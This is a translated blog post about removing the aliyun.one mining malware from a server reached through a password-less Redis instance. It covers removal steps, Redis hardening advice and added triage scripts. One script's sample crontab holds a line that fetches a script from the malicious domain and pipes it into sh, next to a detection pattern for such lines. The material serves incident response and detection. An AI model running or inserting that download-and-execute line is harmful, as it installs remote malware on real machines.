Alibaba Cloud server infected with the aliyun.one mining virus: a removal walkthrough

Outline

I. Overview of the aliyun.one virus

II. Virus removal strategy

III. Summary


I. Symptoms of the virus

Symptom: the server's CPU is saturated, yet looking at the system with top, iotop and similar tools shows nothing that accounts for it.

[screenshot: top output]

Checking crontab revealed a Trojan that had been planted through Redis (which had no password).

Both the hosts file and the crontab had been tampered with. Any attempt to edit the crontab task was overwritten, and the crontab could not be emptied. Traces of the script were everywhere; it must have been continuously re-synchronizing (updating) itself.


Even if you manage to comment an entry out, after a while it is overwritten by a new one.

The Trojan was as follows:

It runs from the compromised host's ("broiler", i.e. zombie) crontab, so if that host has trust relationships with other users' hosts and holds their keys, even the trusted hosts become zombies.

Although it looks as if it merely pulls the script on a schedule, once the attacker is ready to strike they can change the script's content, and its nature becomes something else entirely.


Because the infected account was root, and root cannot be deleted, it was not possible to simply wipe the machine.


II. Removing the virus

First, make the virus's processes visible through the top command:

1. Remove wget and curl so that the virus can no longer be re-downloaded to the server.

2. Empty the /etc/ld.so.preload file, then run the ldconfig command.

3. Run top.

4. Two processes, scsi_eahc_1s and 9432671f5d, were found saturating the CPU; kill them.

5. find / -name 9432671f5d to locate the related files, and remove them.

6. find . | xargs grep -ri "aliyun.one" to locate everything that references the domain.

Remove all of them.

Run crontab -r to delete the jobs, and remove everything else that was found, including hosts entries pointing to the malicious domain.
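The steps above delete things in a fixed order, but nothing in the post shows how to confirm what is actually present before deleting. The script below is an added example, not code from the original post: it checks the three persistence mechanisms the post describes (an /etc/ld.so.preload hijack, which is what hides the miner from top; cron jobs that re-download it; and tampered hosts entries) and flags processes saturating the CPU. The domain and the two process names are the ones the post gives; the sample files it runs against are constructed here, the preload library name and the script path on the domain are placeholders, and the `ps` invocation mentioned in a comment assumes procps on Linux.

```shell
#!/bin/sh
# Added triage helpers (not from the original post). Every function accepts
# an explicit path so it can be run against copies of the files; without an
# argument the first two fall back to the live system files.

IOC_DOMAIN="aliyun.one"   # domain named in the post

# Non-comment entries in ld.so.preload. Anything listed here is injected into
# every dynamically linked program (top, ps, ls ...), which is how the miner
# hid its processes; the post's fix is to truncate the file and run ldconfig
# before trusting top again.
preload_entries() {
    f="${1:-/etc/ld.so.preload}"
    [ -r "$f" ] || return 0
    grep -Ev '^[[:space:]]*(#|$)' "$f" || true
}

# Cron lines that download a remote script and pipe it into a shell: the
# re-infection loop that kept overwriting the cleaned crontab.
downloader_cron_lines() {   # reads a crontab listing on stdin
    grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# hosts(5) lines that name the malicious domain.
hosts_hits() {
    f="${1:-/etc/hosts}"
    [ -r "$f" ] || return 0
    grep -i "$IOC_DOMAIN" "$f" || true
}

# Processes at or above a CPU threshold. Input lines are "<pid> <%cpu> <comm>",
# e.g. from: ps -eo pid,pcpu,comm --sort=-pcpu   (procps on Linux)
high_cpu_procs() {          # $1 = threshold in percent, default 80
    awk -v t="${1:-80}" '$2 + 0 >= t { print $1, $3 }'
}

# --- constructed samples (not real captures) ---------------------------------
SAMPLE_DIR="$(mktemp -d)"
printf '/usr/local/lib/CONSTRUCTED_hider.so\n' > "$SAMPLE_DIR/ld.so.preload"
cat > "$SAMPLE_DIR/crontab.txt" <<'EOF'
# constructed crontab; the script path is a placeholder
*/10 * * * * (curl -fsSL http://aliyun.one/PLACEHOLDER.sh || wget -q -O- http://aliyun.one/PLACEHOLDER.sh) | sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
EOF
printf '127.0.0.1 localhost\n198.51.100.10 aliyun.one\n' > "$SAMPLE_DIR/hosts"
cat > "$SAMPLE_DIR/ps.txt" <<'EOF'
  PID %CPU COMMAND
 9432 99.7 scsi_eahc_1s
 9501 98.2 9432671f5d
  812  0.3 sshd
EOF

echo "ld.so.preload entries:"; preload_entries "$SAMPLE_DIR/ld.so.preload"
echo "downloader cron jobs:";  downloader_cron_lines < "$SAMPLE_DIR/crontab.txt"
echo "hosts hits:";            hosts_hits "$SAMPLE_DIR/hosts"
echo "processes >= 80% CPU:";  high_cpu_procs 80 < "$SAMPLE_DIR/ps.txt"
```

Run the preload check first: while a hijacking library is still listed in /etc/ld.so.preload, the output of top, ps and even grep on the live machine cannot be trusted, which is why the post empties that file and runs ldconfig before looking for the processes.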


III. Summary

After this experience of a virus infection, I feel that security is very important.

The specific measures are as follows:

1. Change the Redis default port; do not start Redis on the default port.

2. Set a Redis login password; do not leave it unset or use a simple password.

3. Likewise, move other services that use default or simple ports to other ports.
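The three measures above can be checked against a redis.conf before the instance is exposed. The script below is an added example, not from the original post: it audits a redis.conf for the settings that made the post's instance reachable without a password, and shows a weak configuration beside a hardened one. The directive names (port, bind, requirepass, protected-mode) are real Redis configuration directives; both sample configs are constructed, and the password value is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): audit a redis.conf for the
# exposure the post describes and compare a weak config with a hardened one.

# Reads redis.conf text on stdin and prints one finding per line; prints
# nothing when none of the weak settings is present.
redis_conf_findings() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        $1 == "port"           { port = $2 }
        $1 == "bind"           { bind = $2; if ($2 == "0.0.0.0" || $2 == "*") open = 1 }
        $1 == "requirepass"    { pass = $2 }
        $1 == "protected-mode" { pm = $2 }
        END {
            if (port == "" || port == "6379")
                print "default port 6379 (post: move Redis off the default port)"
            if (bind == "" || open)
                print "listening on all interfaces (no bind directive, or bind 0.0.0.0 / *)"
            if (pass == "")
                print "no requirepass: anyone who reaches the port has full access"
            else if (length(pass) < 16)
                print "requirepass shorter than 16 characters (post: no simple passwords)"
            if (pm == "no")
                print "protected-mode no"
        }'
}

# Weak config, constructed: roughly what an exposed instance like the one in
# the post looks like (no bind line, so Redis listens on every interface).
WEAK_CONF='port 6379
protected-mode no'

# Hardened config, constructed: the measures from the summary plus binding to
# loopback. Replace the placeholder with a long random secret.
HARDENED_CONF='port 16379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET_PLACEHOLDER'

echo "weak config:";     printf '%s\n' "$WEAK_CONF"     | redis_conf_findings
echo "hardened config:"; printf '%s\n' "$HARDENED_CONF" | redis_conf_findings
```

Moving the port, as the post suggests, only reduces scanning noise; the findings that actually close the hole are the bind restriction and the password, so the audit reports those separately rather than treating a non-default port as sufficient.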

References

https://blog.csdn.net/xujiamin0022016/article/details/103319879

https://www.v2ex.com/amp/t/626230/2

https://blog.csdn.net/simplemurrina/article/details/103682389

https://blog.csdn.net/ruixue2016/article/details/80008766


Source: blog.csdn.net/u013380694/article/details/103778618